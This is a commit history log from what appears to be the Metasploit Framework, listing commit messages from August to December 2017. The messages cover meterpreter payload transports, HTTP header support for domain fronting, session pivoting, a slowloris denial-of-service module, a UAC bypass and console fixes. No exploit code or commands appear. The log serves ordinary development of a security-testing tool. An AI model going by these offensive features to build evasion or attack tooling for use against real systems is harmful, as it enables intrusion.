Commit Graph

13855 Commits (17c8f7c4c769273ec30e72f99f9357e9f812821e)

Author SHA1 Message Date
Brent Cook f7dfba6bae deduplicate code from python meterpreter 2017-12-12 03:12:36 -06:00
Brent Cook b7c231bb93 further normalize transport config 2017-12-12 03:12:36 -06:00
Brent Cook bb5ea540ab fix a number of TODO's in the HTTP handler, remove duplication in handlers 2017-12-12 03:12:36 -06:00
Brent Cook 528a423fc0 fix python override scheme 2017-12-12 03:12:36 -06:00
Brent Cook f49006222c remove unneeded uri 2017-12-12 03:12:36 -06:00
Brent Cook 8e76c4cb4f handle override at the meterpreter config layer 2017-12-12 03:12:36 -06:00
Brent Cook 636b93b026 minor simplification 2017-12-12 03:12:36 -06:00
Brent Cook 017374be71 pass lhost/lport back into generate_stage with reverse_http/s 2017-12-12 03:12:36 -06:00
Brent Cook 1653e31f71 Merge branch 'upstream-master' into land-9126- 2017-12-11 03:57:00 -06:00
Metasploit 348cbe54b6
Bump version of framework to 4.16.23 2017-12-08 10:01:55 -08:00
Pearce Barry 7aef0f249e
Per MS-2916, load Mettle extensions via new API. 2017-12-07 20:40:22 -06:00
William Vu 2565ad6a27 Handle IPv6 addresses in full_uri (add brackets) 2017-12-07 12:56:55 -06:00
Brent Cook c15f379343 remove some unneeded backward-compat code 2017-12-04 22:27:21 -06:00
William Vu 19b37c7070
Land #9263, drb_remote_codeexec fixes
See pull requests #7531 and #7749 for hysterical raisins.
2017-12-04 18:45:03 -06:00
Metasploit fd1681edd9
Bump version of framework to 4.16.22 2017-12-01 10:04:07 -08:00
Brent Cook 09dd5b8489 fix check command to not require an rport _method_ 2017-11-30 10:51:21 -06:00
Brent Cook c848379ecb simply use refname in the prompt? 2017-11-29 20:52:14 -06:00
Brent Cook e5a5d35ad8 add 'promptname' that expands the module path a bit more
This allows the user to actually see the module context.
2017-11-29 19:49:43 -06:00
Brent Cook 55f56a5350
Land #9110, added -C option to change default hosts columns 2017-11-29 17:48:44 -06:00
Brent Cook 0aeb245c9c
Land #9252, docker improvements 2017-11-29 17:15:47 -06:00
bwatters-r7 e8965767a0
Land 9207, Expose more uuid attributes 2017-11-29 16:25:05 -06:00
Metasploit 174d0d46de
Bump version of framework to 4.16.21 2017-11-29 10:45:55 -08:00
Brent Cook 70ec576d52 use correct session variable 2017-11-29 11:53:56 -06:00
Brent Cook ec2b5d48a6 add missing payload uuid accessors 2017-11-29 11:49:41 -06:00
Brent Cook 446f3fa675 more conversions 2017-11-29 11:49:41 -06:00
Brent Cook 59446f3d96 change ui to use new settings 2017-11-29 11:49:41 -06:00
Brent Cook 8051f790d0 if there is info in the uuid_db, put it in payload_uuid automatically 2017-11-29 11:49:41 -06:00
Jeffrey Martin e73ba0b3ca
Merge released '4.x' into master 2017-11-29 10:27:42 -06:00
Adam Cammack 3fff092042
Fix include scope in external module mixin
The auxiliary report mixin overrides some of the methods in
Metasploit::Credential, which is fine in framework, but causes issues in
projects relying on the base behavior of Metasploit::Credential. This
changes the include scope from global to just whatever includes the
external module mixin.
2017-11-28 21:41:52 -06:00
William Vu f132c1572f
Fix #9194, clarified error for reloading modules 2017-11-28 17:15:56 -06:00
William Vu 7b3bf85d03 Print the generated command stager for debugging 2017-11-28 16:00:28 -06:00
Christian Mehlmauer 50351320d7
more docker work 2017-11-28 21:35:20 +01:00
William Vu 65412cd2f1
Land #9201, enhanced tab completion 2017-11-27 11:37:04 -06:00
Brent Cook 2c6cfabbc3
Land #8948, allow configuring payload HTTP headers for domain fronting 2017-11-25 10:08:22 -06:00
Brent Cook 8645a518b3 add mettle support for custom headers 2017-11-24 20:27:34 -06:00
Metasploit c9da8f7a18
Bump version of framework to 4.16.20 2017-11-24 10:01:50 -08:00
Tim W ce9d2aff2b more osx hacks 2017-11-22 17:25:49 +08:00
Tim W 0f2bfb70c0 hacky fix for osx 2017-11-22 13:07:42 +08:00
scriptjunkie 9a81cc70dd Fix corruption of non-latin characters in W methods 2017-11-21 20:58:38 -06:00
Brent Cook 81c6823b72 handle interrupt and unknown exceptions properly with external modules 2017-11-21 17:50:53 -06:00
Adam Cammack 19844fb6ed
Land #9227, Add slowloris denial of service 2017-11-21 15:42:39 -06:00
Tim 92190403cc use full target_path 2017-11-22 05:42:01 +08:00
Matthew Kienow b6c81e6da0
Reimplement slowloris as external module 2017-11-21 16:21:01 -05:00
OJ fea28a89a5 Fix TLV defs for http headers 2017-11-21 13:47:19 -06:00
Brent Cook ea37196614 use cooler names c/o @timwr, make options easier to grep 2017-11-21 13:47:19 -06:00
Brent Cook 85acbadf01 more DRYing 2017-11-21 13:47:19 -06:00
Brent Cook 37ab771ca9 uri is not always defined, fix python stager generation 2017-11-21 13:47:19 -06:00
Brent Cook 2076db2d61 DRY up common stager and payload http and retry options 2017-11-21 13:47:19 -06:00
Brent Cook 1fd7f7c8bc prefix MeterpreterUserAgent and PayloadProxy* with Http for consistency,
this also adds aliases where needed
2017-11-21 13:47:19 -06:00
Tim a5af21fa1a add http headers to Android/Java 2017-11-21 13:47:19 -06:00
OJ ac79cc9f78 Fix up header string generation in transports 2017-11-21 13:47:18 -06:00
OJ f6e9b12b43 Make sure stageless is supported 2017-11-21 13:47:18 -06:00
OJ 656babe9f4 Custom host header support in python meterp 2017-11-21 13:47:18 -06:00
OJ a78d8f83fc Add HTTP header support for Host/Cookie/Referer
This is to start the support for things like domain fronting.
2017-11-21 13:47:18 -06:00
Brent Cook a4e199a6dd
Land #9000, enhance module option registration 2017-11-21 12:09:21 -06:00
Brent Cook c5cc013819 auto-detect SSL supported options 2017-11-21 08:30:42 -06:00
Brent Cook 967b459ff1 restore default enum is first value behavior 2017-11-21 08:30:42 -06:00
Brent Cook 6615c6efc7 tighten up corner cases with option validation 2017-11-21 08:30:42 -06:00
Brent Cook 6da66e885a fix enum default logic for bools that default to false 2017-11-21 08:30:42 -06:00
Brent Cook d811a2a8c1 set good defaults 2017-11-21 02:52:05 -06:00
Brent Cook 65c58c3d55 set a good default, remove unused methods, speed up checks 2017-11-21 02:52:05 -06:00
Brent Cook ffa6d74a23 remove historical cruft 2017-11-21 02:52:05 -06:00
Brent Cook d3ee86dc5c update to new format 2017-11-21 02:52:05 -06:00
Brent Cook 249c08f597 usability improvements ith how base options are registered
This adds named parameters for all of the current array-index based
options. It also allows specifying the description as the 2nd parameter,
allowing the 'required' parameter to be implicitly false (the most
common value).

A simple parameter like:

 OptAddress.new('ReverseListenerBindAddress',
   [false, 'The specific IP address to bind to on the local system']),

Can now be rewritten as:

 OptAddress.new('ReverseListenerBindAddress',
   'The specific IP address to bind to on the local system'),

More complex options are also now easier to read:

 OptString.new(
   'HttpUserAgent',
   'The user-agent that the payload should use',
   default: Rex::UserAgent.shortest,
   aliases: ['MeterpreterUserAgent']
 ),

This also makes dealing with enums easier because default is implicit
unless specified. This:

  OptEnum.new('PayloadProxyType',
    [true, 'The proxy type, HTTP or SOCKS', 'HTTP', ['HTTP', 'SOCKS']]),

Becomes:

  OptEnum.new('HttpProxyType',
    'The proxy type, HTTP or SOCKS', required: true, enums: ['HTTP', 'SOCKS'])

This maintains full backward compatibility with existing code as well.
2017-11-21 02:52:05 -06:00
Adam Cammack 40a71af7ed
Add missing `end` 2017-11-20 17:50:59 -06:00
Adam Cammack 2fdc34c8fd
Add new template for DoS modules 2017-11-20 17:19:14 -06:00
Adam Cammack dd57138423
Make external module read loop more robust
Changes from a "hope we get at most one message at a time" model to
something beginning to resemble a state machine. Also logs error output
and fails the MSF module when the external module fails.
2017-11-20 16:52:05 -06:00
Matthew Kienow 39f06a3995
Land #8807, template for external module servers 2017-11-20 17:34:37 -05:00
christopher lee 238aecf81c Integrated first round of feedback 2017-11-20 10:45:39 -06:00
christopher lee 621130d74b Added missing requires 2017-11-17 13:06:05 -06:00
christopher lee a16cd5aade Clean up metadata store logic 2017-11-17 12:42:19 -06:00
Metasploit 602406a423
Bump version of framework to 4.16.19 2017-11-17 10:02:22 -08:00
christopher lee 0e642bd9cd Remove puts and fix bug 2017-11-16 12:59:14 -06:00
christopher lee e89eb6e8b6 Fix first time startup timing bug 2017-11-16 12:50:31 -06:00
Metasploit 5cdd364590
Bump version of framework to 4.16.18 2017-11-15 19:46:12 -08:00
christopher lee fe1af35107 First pass at changes needed for module metadata caching 2017-11-15 16:38:01 -06:00
Adam Cammack f357efd97c
Land #9208, add AArch64 ELF to Msf::Util::Exe 2017-11-15 14:22:27 -06:00
Tim 4ec0faf35d fix aarch64 cmdstager 2017-11-15 16:47:17 +08:00
Jeffrey Martin 80b381cde9
Merge released '4.x' into master 2017-11-13 14:11:23 -06:00
Spencer McIntyre bc691cbd00 Document the new tab completion functions 2017-11-11 17:17:48 -05:00
Spencer McIntyre fb7635502d Tab completion for exploit and handler commands 2017-11-11 17:11:54 -05:00
Spencer McIntyre 68a43fef36 Add the new generic tab completion functoin 2017-11-11 16:47:11 -05:00
Metasploit 4f660d7dd7
Bump version of framework to 4.16.17 2017-11-10 10:05:05 -08:00
William Vu 97859ebf8c Clarify XXX comment no user will ever see anyway 2017-11-09 15:23:37 -06:00
William Vu 577baf6070 Add a check for .rb in cmd_edit 2017-11-09 15:17:53 -06:00
Patrick Webster 2f6da89674 Change author name to nick. 2017-11-09 03:00:24 +11:00
William Vu fbbc8da8fb Fix raise(s) in MSSQL client aborting mssql_login 2017-11-07 14:30:47 -06:00
christopher lee 43ddc66350 Initial fix for non db cache 2017-11-07 10:33:47 -06:00
Metasploit deb5a7b015
Bump version of framework to 4.16.16 2017-11-03 10:03:38 -07:00
h00die 697031eb36 mysql UDF now multi 2017-11-03 05:26:05 -04:00
Metasploit a14102083c
Bump version of framework to 4.16.15 2017-11-02 10:01:12 -07:00
bwatters-r7 c2a979dd3c
Land #9134, fix buggy handling of partial ingress packet data 2017-11-01 20:06:23 -05:00
Spencer McIntyre d815e42ccf Add a generic tab completion function 2017-11-01 20:38:45 -04:00
William Vu 5de190f092
Land #9145, ERB/<ruby> for Meterpreter resource 2017-11-01 13:48:51 -05:00
Brent Cook a347dee372
Land #9150, fix broken and simplify unusual RuntimeError exceptions 2017-11-01 06:03:36 -05:00
Brent Cook 90766ceceb remove more unusual raise RuntimeError patterns 2017-11-01 05:59:12 -05:00
Spencer McIntyre 1462330f34 Add tab completion to the payload generate command 2017-10-31 20:33:31 -04:00
lvarela-r7 c36184697c
Merge pull request #9150 from bcook-r7/runtimeerror
Fix several broken raise RuntimeError calls in error paths
2017-10-31 14:47:42 -05:00
Pearce Barry 48975a4327
Support multiple suffixes on meterpreter extensions. 2017-10-31 10:04:34 -05:00
Pearce Barry daf2acc2b1
Initial work to support Mettle exetensions (and a sniffer).
See MS-2775.
2017-10-31 10:04:30 -05:00
Brent Cook 95b6cda06e
Land #9146, add e500v2 and reduce size of x86_64 2017-10-31 09:54:07 -05:00
Brent Cook c4dcd79e41
Land #9144, fix misspelling in exploit/windows/local/wmi_persistence 2017-10-31 05:01:13 -05:00
Brent Cook aa0ac57238 use implicit RuntimeError 2017-10-31 04:53:14 -05:00
Brent Cook 9389052f61 fix more broken RuntimeError calls 2017-10-31 04:45:19 -05:00
Brent Cook f42b980cf0 fix misspelled RuntimeError 2017-10-30 15:42:11 -05:00
Brent Cook 56eb828cc5 add e500v2 payloads 2017-10-30 14:04:10 -05:00
Spencer McIntyre 940573ad49 Support ruby directives in Meterpreter rc scripts 2017-10-29 15:57:33 -04:00
h00die 3b8ef02c29 sid vs side 2017-10-29 08:36:05 -04:00
William Vu 9349e1eda5 Fix find_script_path to check only files 2017-10-27 12:28:58 -05:00
William Vu 73c9807c55 Add module support for sessions -s 2017-10-27 12:28:53 -05:00
Metasploit 140955f220
Bump version of framework to 4.16.14 2017-10-27 10:03:00 -07:00
Brent Cook d188982760 handle masked EOF from Rex sockets (TODO: kill that behavior) 2017-10-27 02:29:25 -07:00
Brent Cook 85b59c87ca fix buggy handling of partial ingress packet data
If we have more data, and the packet parser needs more data, connect the two
together rather than bailing. This fixes reverse_tcp_ssl along with probably a
lot of other higher-latency corner cases.
2017-10-27 02:15:08 -07:00
Jeffrey Martin 4274b76473
Land #9119, Fix #8436, allow session upgrading on meterpreter sessions 2017-10-25 10:26:27 -05:00
Jeffrey Martin 386e14828a
Land #8728, Psexec via PSH related fixes 2017-10-24 15:55:18 -05:00
Tim 40e57d7ee6 android payload options 2017-10-24 18:32:47 +08:00
Brent Cook 1b01232624
Land #9070, Fix bug copying MACE attributes between files 2017-10-23 22:15:42 -05:00
Brent Cook 402e926151
Land #9081, Fix ftp.rb to get files larger than 16384 2017-10-23 22:11:36 -05:00
Brent Cook c6bc55a175
Land #9082, Fix ftp.rb so it closes all data sockets 2017-10-23 22:10:38 -05:00
Tim ca4feb5136 fix session upgrading 2017-10-23 01:26:45 +08:00
Dave Farrow 636551aa03 Fixed help message to match test 2017-10-20 21:32:54 -07:00
Dave Farrow ea1ac3d5b3 #9108: added -C option to change default hosts columns
The -C option saves the column list the user provided and uses that as the default column list until msfconsole is restarted
2017-10-20 20:39:38 -07:00
Metasploit 884b68fa60
Bump version of framework to 4.16.13 2017-10-20 10:02:23 -07:00
William Vu c795cef69f
Land #9099, disconnect option for send_request_cgi 2017-10-20 10:50:56 -05:00
William Vu 8e5deac3f4 Fix nil bug in setting PromptChar without Prompt 2017-10-20 00:38:01 -05:00
RageLtMan a3912e4913 Provide disconnect option to send_request_cgi
The HTTP client mixin provides a #send_request_cgi method which
forcibly disconnects the client after receiving a response. This
terminates certain types of resulting sessions which depend on the
connection from the client to maintain a subprocess housing the
shell invocation.

Provide a disconnect boolean option to #send_request_cgi which
is checked in the disconnect(c) call after receiving the response.

Testing:
  Locally tested on in-house exploit module written for disclosure
report.

TODO:
  Discuss possibility of implementing fully asynchronous methods
like #send_request_cgi_async which won't bother getting a response
for cases such as the module mentioned above which is a command
injection via unfiltered POST var.
2017-10-19 21:22:31 -04:00
William Vu 60a7a80ff0
Land #9095, default PromptTimeFormat (%T) 2017-10-17 16:50:47 -05:00
James Lee af42f517b8 Default PromptTimeFormat to %T 2017-10-17 16:39:44 -05:00
Evgeny Naumov d5cdd2567a add missing method 2017-10-16 16:01:53 -04:00
Jeffrey Martin b04f5bdf90
Land #9077, Enhancing the functionality on the nodejs shell_reverse_tcp payload. 2017-10-16 10:49:17 -05:00
Jeffrey Martin 6df8c40bb1
adjust whitespace 'no tabs' more reabable 2017-10-13 17:01:47 -05:00
Wei Chen 6b89f62b08 Land #9080, ensure autoruns on shell sessions
Land #9080
2017-10-13 15:35:31 -05:00
Wei Chen 5ce4c32213 Use session object instead of self
The session object has :process_autoruns, not self
2017-10-13 15:33:27 -05:00
William Vu b2de5aba07
Fix #9075, super setup fix for local exploits 2017-10-13 12:45:14 -05:00
bigendiansmalls 1b306caf39
Fixed ftp.rb to get files larger than 16384
Existing ftp.rb did get_once, which limits file
DL to 16384 (def_block_size). Change to get and
added one more timeout variable see:
http://www.rubydoc.info/gems/librex/Rex%2FIO%2FStream:def_block_size
and
http://www.rubydoc.info/gems/librex/Rex%2FIO%2FStream:get_once
and
http://www.rubydoc.info/gems/librex/Rex%2FIO%2FStream:get
2017-10-13 12:41:11 -05:00
Metasploit 88585a5cfd
Bump version of framework to 4.16.12 2017-10-13 10:03:48 -07:00
bigendiansmalls e5e9c7ccd6
Fixed ftp.rb so it closes all data sockets
ftp.rb was doing a shutdown without a close on data
(not command) sockets.  This can cause CLOSE_WAIT
for extended periods in certain circumstances-ending
only when msf itself is closed.
2017-10-13 10:09:43 -05:00
Brent Cook e209256d62 ensure we do autoruns for all session types 2017-10-12 23:11:58 -05:00
William Vu bf2fb7051a Fix session compatibility check for post modules 2017-10-12 11:57:11 -05:00
itsmeroy2012 a0abffb6c4 Adding functionality of StagerRetryWait and StagerRetryCount 2017-10-12 22:25:00 +05:30
William Vu f556a5f805 Add compatible session types to post module info 2017-10-12 11:41:02 -05:00
itsmeroy2012 374c139d33 Increasing the functionality of the nodejs shell_reverse_tcp payload 2017-10-12 19:05:59 +05:30
bwatters-r7 294230c455
Land #8509, add Winsxs bypass for UAC 2017-10-11 16:24:52 -05:00
William Webb 84fe0847bf
Land #9074, Add prints and error checking to HTTP CmdStagers 2017-10-11 14:27:52 -05:00
William Vu 27876a91d3 Add prints and better checking to HTTP CmdStagers
Admittedly, this code is more convoluted than it needs to be.
2017-10-11 14:01:56 -05:00
Jeffrey Martin b76c1f3647
remove invalid 'client' object reference in nodejs
fix #9063 by removing invalid object reference introduced in PR #8825
2017-10-11 11:09:28 -05:00
Bradley Landherr bdc00ef2df Removing unecessary comment 2017-10-11 06:34:09 -07:00
Bradley Landherr 8dee369eb7 Fixing the -f option, removing reference to undefined 'path' variable & get_file_mace already returns a 'Time' object instance 2017-10-11 06:28:03 -07:00
Adam Cammack 88f53352c7
Land #9056, Check for /etc/issue before reading 2017-10-10 15:05:27 -05:00
Jeffrey Martin 57afc3b939
Land #9044, Address generation issues with pure PSH payloads 2017-10-10 10:40:33 -05:00
h00die bf731b4f5e look before leap issues 2017-10-09 14:27:09 -04:00
Adam Cammack 436b72d4cc
Land #9023, Add tab completion to the edit command 2017-10-09 11:37:12 -05:00
William Vu 27dcc162b2 Revert to Vim because ed is the standard editor
https://www.gnu.org/fun/jokes/ed-msg.html
2017-10-09 11:34:45 -05:00
William Webb 14308fb77d
Land #9045, Copy original request ID into TLV response 2017-10-09 10:58:02 -05:00
bwatters-r7 fc5ab96ad6 Merging to prep for testing
Merge branch 'master' of github.com:rapid7/metasploit-framework into upstream-master
2017-10-09 10:31:30 -05:00
bwatters-r7 7df18e378d Fix conflicts in PR 8509 by mergeing to master 2017-10-09 10:30:21 -05:00
James Barnett 56e95f15c9
Land #9024, fix bug when manually adding loot
cmd_loot was throwing a stack trace when the host was not properly defined.
This fixes it to give a useful error message.
2017-10-06 16:02:12 -05:00
Jeffrey Martin d0a1fb6019
tlv response to ID based request with original ID
When a tlv response is created the request ID being responded to
needs to be copied into response created.
2017-10-06 13:58:38 -05:00
William Webb d9e0d891a1
Land #9010, Remove checks for hardcoded SYSTEM account name 2017-10-06 13:42:18 -05:00
RageLtMan 124a1531f4 Clean up powershell exec string
The scriptblock invocation is already coming from Rex, so there's
no need to re-wrap the executed code in more of the same.
2017-10-06 13:19:36 -04:00
Metasploit 4acef04e0d
Bump version of framework to 4.16.11 2017-10-06 10:01:51 -07:00
RageLtMan 9afdde2938 Address generation issues with pure PSH payloads
Powershell payloads were generating using the :generate method
mixed in from Payload::Windows::Exec which is a binary payload
mixin.

Address the breakage by implementing a generate method which simply
outputs the script code produced by the module with no additional
content prepended or appended.

While here, cleanup the commandline generation for the script being
produced by having Rex do it (this permits changes made in Rex to
benefit all consumers).

As a bonus, drop the IEX invocation since it'll trip up AMSI and
upgrade to the scripblock execution semantic.

Credit for finding this little gem goes to bperry - i dont usually
use the native powershell command shells, and managed to miss this
for a long time. Thanks boss.

Testing:
  Local in pry

@bperry: Could you test and ping me back if this is right?
2017-10-06 12:32:52 -04:00
Brent Cook 809d0f79a1
Land #9026, Fix cache invalidation bug in tab completion 2017-10-05 16:41:00 -05:00
Brent Cook b7e209a5f3
Land #9033, Geolocate API update 2017-10-05 16:39:09 -05:00
Tim e534d3cdc8 fix transport and sleep commands on java 2017-10-04 10:36:01 +08:00
William Vu 5b9a4d73ee Readd hostless loot display
In the chance event someone actually managed to store it.
2017-10-02 23:31:44 -05:00
William Vu 403b5e2fa8 Move TARGET check into option_values_payloads 2017-10-02 23:22:42 -05:00
h00die fc66683502 fixes #8928 2017-10-01 19:49:32 -04:00
William Vu 9941097a5c Remove extraneous else 2017-09-29 19:01:04 -05:00
William Vu e8d0f2dde0 Fix missing message for vprint_* in AuthBrute 2017-09-29 18:51:35 -05:00
William Vu 6de986bd70 Fix cache invalidation bug in tab completion
We use active_module instead of cmd_use to invalidate @cache_payloads,
since the ivar is no longer shared between cmd_set and cmd_use.

Fixes #8483. See #7655.
2017-09-29 18:01:50 -05:00
William Vu 0723477b49 Fix nil bug in loot -a and nix hostless loot
Apparently you can't actually store hostless loot.
2017-09-29 16:16:16 -05:00
William Vu 1ec968192b Add tab completion to the edit command 2017-09-29 15:43:53 -05:00
bwatters-r7 e0fee9e317
Land #8821, Expose session naming 2017-09-29 15:32:47 -05:00
Metasploit 32104eb90e
Bump version of framework to 4.16.10 2017-09-29 10:04:04 -07:00
loftwing f777e2ab3b Merge branch 'master' into fix_nmap_imports
bringing branch up to date
2017-09-27 12:52:27 -05:00
loftwing 51c1cddb5c Removed requirement for a host to have ports 2017-09-27 12:43:50 -05:00
OJ 3068fb6e7e
Fix getprivs and getsystem
This is a fix for crap and stupid stuff that I did half way through the
packet pivot code. I was working on some priv stuff at the same time,
and when I realised that the work I was doing was not sensible as part
of the packet pivot PR, I failed to revert my changes properly.

As a result I broke `getprivs` and `getsystem`. I am sorry. And I'm
ashamed.
2017-09-27 16:31:42 +10:00
Christian Mehlmauer 81406a073e
tidy up code 2017-09-27 08:01:48 +02:00
Christian Mehlmauer 41e3895424
remove checks for hardcoded name 2017-09-27 07:41:06 +02:00
Brent Cook 0d31c1c9a8
Land #8945, fix issue where we can call shutdown on a closed socket 2017-09-26 16:01:51 -05:00
Brent Cook 71f13db918 style updates 2017-09-26 15:58:43 -05:00
Adam Cammack 0408979e54
Land #9005, Remove spurious commas 2017-09-26 15:36:33 -05:00
Brent Cook cad36ee14e
Land #8952, suhosin compatibility added to staged payload 2017-09-26 15:22:36 -05:00
Adam Cammack 968ae8e267
Land #8925, Allow `edit` to optionally take a path 2017-09-26 13:32:39 -05:00
root ec51ab2547 Exit function param bug 2017-09-26 11:16:41 +03:00
William Vu d234409d40
Land #8918, wp_admin_shell_upload multisite fix 2017-09-25 13:54:10 -05:00
Josh Hale 0e59f47095 Comments and whitespace check 2017-09-24 16:37:30 -05:00
Josh Hale 23e1b5b872 Add search term support 2017-09-24 16:25:27 -05:00
Josh Hale 664fd1f7e3 Support single file path 2017-09-24 16:13:26 -05:00
Josh Hale 9f0ff3f3a3 Add in sort and order options 2017-09-23 23:14:21 -05:00
Josh Hale 2068514800 Add initial lls command 2017-09-23 21:38:53 -05:00
Brent Cook d73e95e7db
Land #8946, fix #8879, APK injection edge cases 2017-09-23 20:48:12 -04:00
Pearce Barry 8853193542
Land #8987, Fix opening non-existant files on unix 2017-09-22 13:15:44 -05:00
Metasploit 68fa3d45f3
Bump version of framework to 4.16.9 2017-09-22 10:05:19 -07:00
Adam Cammack 62aac450f8
Change confusing variable name 2017-09-22 11:43:26 -05:00
Adam Cammack 4ea8f639a3
Add host and service reporting to external modules 2017-09-22 11:42:32 -05:00
h00die 36fc01d375 check files before opening 2017-09-21 19:36:19 -04:00
Brent Cook d8ee4150e6 move client core constants closer to where they are actually used 2017-09-19 03:22:13 -05:00
Brent Cook 5b579baa33 remove unused Linux migration code 2017-09-19 03:04:43 -05:00
Brent Cook 0e15b2d002 remove unneeded METERPRETER_TRANSPORT constants 2017-09-19 02:59:05 -05:00
RageLtMan 271bd4c4fe Rename METERPRETER_TRANSPORT_SSL to ..._TCP
Since OpenSSL is no longer packages with meterpreter, and transport
secrecy is handled at L7, the SSL cons name doesn't apply anymore.
Rename METERPRETER_TRANSPORT_SSL to METERPRETER_TRANSPORT_TCP for
consistency with wire-level implementation.
2017-09-17 14:31:15 -04:00
Metasploit b2f5bd16e6
Bump version of framework to 4.16.8 2017-09-15 10:02:38 -07:00
Tim 9afb09813f update cmd_edit_help text 2017-09-13 14:54:35 +08:00
Anant Shrivastava 363d3c28d7
suhosin comaptibility added to staged payload 2017-09-12 08:49:53 +05:30
Craig Smith b218cc3c7f Merge branch 'master' into hw_auto_padding_fix 2017-09-11 18:30:34 -07:00
Craig Smith ad9329993d Added better padding and flowcontrol support. 2017-09-11 18:20:57 -07:00
Jeffrey Martin a58552daad
Land #8825, Handle missing util.pump in nodejs shell payloads 2017-09-11 15:32:21 -05:00
Tim c3fa30707d fix #8879, fix APK injection edge cases 2017-09-11 12:03:20 +08:00
RageLtMan 8d60fdf9e7 Bug - HTTP Client can call :shutdown on closed IO
When running Rex HTTP client calls across pivots, pivot sockets
can get closed by the remote server, resulting in a closed :conn
object within the client object. The clients :close method calls
self.conn.shutdown which raises an 'IOError closed stream' on what
is effectively a TCPSocket object in a closed state (under the Rex
abstraction).

Resolve by moving the self.conn.closed? check into the conditional
just above the :shutdown call, and remove if from the underlying
:close call as calling :close on an already closed TCPSocket
returns nil as opposed to throwing an exception like the :shutdown
method.
2017-09-10 03:09:59 -04:00
Metasploit faa84faf25
Bump version of framework to 4.16.7 2017-09-08 15:38:22 -07:00
Metasploit f5a73f3efe
Bump version of framework to 4.16.6 2017-09-08 10:03:41 -07:00
Brent Cook b9fdca04a1 rework logical fix for #8884 to function with bootstrap code 2017-09-07 01:43:58 -05:00
Brent Cook c365db135a pull in GUID fixes from #8818 2017-09-07 01:39:49 -05:00
Brent Cook 9877a61eff bump payloads 2017-09-07 01:36:25 -05:00
OJ b38a962c09 Fix default session GUID when not specified
This resolves an issue with stategless HTTP sessions
2017-09-07 01:36:25 -05:00
OJ 7a2a47586b Fix named pipe migration stubs 2017-09-07 01:36:25 -05:00
OJ 5294722b96 Prevent socket-like behaviours during migrate on pivoted sessions 2017-09-07 01:36:24 -05:00
OJ dfba42e2c1 Fix exception when datastore value is nil in meterp session 2017-09-07 01:36:24 -05:00
OJ 4ec87985a2 Fix stager crash and support pivots in x64 meterp loader 2017-09-07 01:36:24 -05:00
OJ c8b8ef03bd Force max 0x10000 bytes when reading from pipe in stager 2017-09-07 01:36:23 -05:00
OJ bfdea35aca A few UI touch ups 2017-09-07 01:36:23 -05:00
OJ 75270af9e7 Tweaking of the pivot list output 2017-09-07 01:36:23 -05:00
OJ 8b8e5e4cb5 First iteration of the pivot menu for meterpreter 2017-09-07 01:36:23 -05:00
OJ d525b015f0 Enable keepalive for pivoted sessions 2017-09-07 01:36:22 -05:00
OJ 558d007d8e Final tweak to avoid issues in session dump 2017-09-07 01:36:22 -05:00
OJ f004e6f0f2 Fix session output for pivoted sessions 2017-09-07 01:36:22 -05:00
OJ 7acd772c10 Pivot session stability, display and handling 2017-09-07 01:36:21 -05:00
OJ fdc9864b61 First working packet pivot session! 2017-09-07 01:36:20 -05:00
OJ e3de01219a Pushed on with more pivot code 2017-09-07 01:33:54 -05:00
OJ abc80655b7 Progress in named pipe pivots, more to come 2017-09-07 01:33:54 -05:00
OJ 816e78b6f6 First pass of named pipe code for pivots 2017-09-07 01:33:53 -05:00
William Vu 36bbe00ea1
Land #8922, db_nmap tab completion fix 2017-09-07 00:28:03 -05:00
Tim bc02df16b3 update cmd_edit_help 2017-09-06 16:04:54 +08:00
Tim e83e4d0a7e add argument to cmd_edit 2017-09-06 11:30:28 +08:00
Tim 636d1a5fcb fix #8921, fix crash on nmap tab completion 2017-09-05 16:36:14 +08:00
james fde68acc0e Styling changes in wordpress helpers
Changes based on rubocop output
2017-09-02 22:26:04 -05:00
james fdf7149438 Add support for multi-site wp instances in wp_admin_shell_upload
This change allows for redirects to be followed in wordpress_helper_get_plugin_upload_nonce
Redirect is from:
/wp-admin/plugin-install.php
to
/wp-admin/network/plugin-install.php
2017-09-02 22:12:56 -05:00
William Webb 055e88d261
Land #8897, Rewrite timestomp command dispatcher to deal with arguments properly 2017-09-01 12:11:57 -05:00
Metasploit 92f5290a50
Bump version of framework to 4.16.5 2017-09-01 10:08:40 -07:00
Brent Cook bcfab11ca9
land #8913, fix false positives of telnet scanner vs http servers 2017-08-31 16:31:08 -05:00
Brent Cook 7c14a3d370 expand the check for weird HTTP / HTML serving servers 2017-08-31 16:30:02 -05:00
Jin Qian 1a735c48b4 Fix MS2715, false positive when telneting against web server
Add a condition to identify when server returned HTML as login failure
2017-08-31 11:35:51 -05:00
Tim 86ee77ffb0 add aarch64 nops and fix aarch64 cmdstager 2017-08-31 18:48:58 +08:00
Brent Cook 847407f1dd
Land #8899, Make backgrounding messages more consistent 2017-08-28 18:51:22 -05:00
William Vu 0e1bafb2d1
Land #8902, vendored robots gem 2017-08-28 16:42:38 -05:00
Metasploit a0131f450e
Bump version of framework to 4.16.4 2017-08-28 14:34:39 -07:00
Brent Cook 06fc5c8a3e add license, fix style violations, log with dlog 2017-08-28 15:47:47 -05:00
Brent Cook 3d489a516c Only test the first element of status
From f5df1ba7827581a7c771a3deffb6062551611134 Mon Sep 17 00:00:00 2001
From: Postmodern <postmodern.mod3@gmail.com>
Date: Thu, 4 Aug 2016 19:35:10 -0700
Subject: [PATCH 2/2] Only test the first element of status

* When using webmock, the `"OK"` String is not present in `StringIO#status`.
2017-08-28 15:47:47 -05:00
Brent Cook dafd7885e1 Fixing mix case of user-agent.
From bfbe173cd6bf91be477ef0affc2c4c86ca75bc1d Mon Sep 17 00:00:00 2001
From: Jason Kim <jkim@avvo.com>
Date: Thu, 3 Nov 2011 15:43:14 -0700
Subject: [PATCH 1/2] Fixing mix case of user-agent. Adding/Fixing test.
2017-08-28 15:47:46 -05:00
Brent Cook 928d632042 import https://github.com/fizx/robots.git 0.10.1 2017-08-28 15:47:46 -05:00
Brent Cook f7071818b1 more updates 2017-08-28 14:10:51 -05:00
Jeffrey Martin 368e37428e
update nessus v2 import for consistent proto case 2017-08-28 12:32:04 -05:00
Adam Cammack d6ed1f6f8d
Make backgrounding messages more consistent
Inspired by the work in #8896
2017-08-28 11:19:17 -05:00
Brent Cook a0e04760b5 rewrite timestomp command dispatcher to deal with file args properly 2017-08-28 08:25:42 -05:00
Marc Green d50c7d7f5c Output job id when jobifying exploit 2017-08-28 14:36:04 +02:00
Brent Cook 1e8edb377f
Land #8873, cleanup enable_rdp, add error handling 2017-08-28 05:50:42 -05:00
